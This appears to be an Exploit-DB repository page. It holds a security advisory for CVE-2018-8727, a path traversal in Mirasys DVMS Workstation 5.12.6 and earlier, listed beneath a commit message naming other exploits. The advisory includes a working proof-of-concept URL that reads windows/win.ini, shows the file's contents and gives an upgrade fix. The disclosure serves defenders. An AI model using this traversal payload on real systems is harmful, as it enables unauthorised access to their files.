ac267cb298
11 changes to exploits/shellcodes Redis 5.0 - Denial of Service ntp 4.2.8p11 - Local Buffer Overflow (PoC) Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Mirasys DVMS Workstation 5.12.6 - Path Traversal MaDDash 2.0.2 - Directory Listing NewMark CMS 2.1 - 'sec_id' SQL Injection TP-Link TL-WA850RE - Remote Command Execution Apache CouchDB < 2.1.0 - Remote Code Execution IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit) VideoInsight WebClient 5 - SQL Injection
23 lines
No EOL
865 B
Text
23 lines
No EOL
865 B
Text
# Exploit Title: Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6
|
|
# Date: 10-06-2018
|
|
# Exploit Author: Onvio, Dick Snel, https://www.onvio.nl
|
|
# Vendor Homepage: https://www.mirasys.com/
|
|
# Software Link: https://www.onvio.nl/binaries/mirasys_5_12_6.zip
|
|
# Version: <= 5.12.6
|
|
# Tested on: Windows 10 Pro x64
|
|
# CVE : CVE-2018-8727
|
|
|
|
1. Description
|
|
|
|
Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6 allows an attacker to traverse the file system to access files or directories via the Web Client webserver.
|
|
|
|
More detail on the exploit: https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
|
|
|
|
2. Proof of Concept
|
|
|
|
http://localhost:9999/.../.../.../.../.../.../.../.../.../windows/win.ini
|
|
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
|
|
|
|
3. Solution
|
|
|
|
Upgrade to any version > 5.12.6 |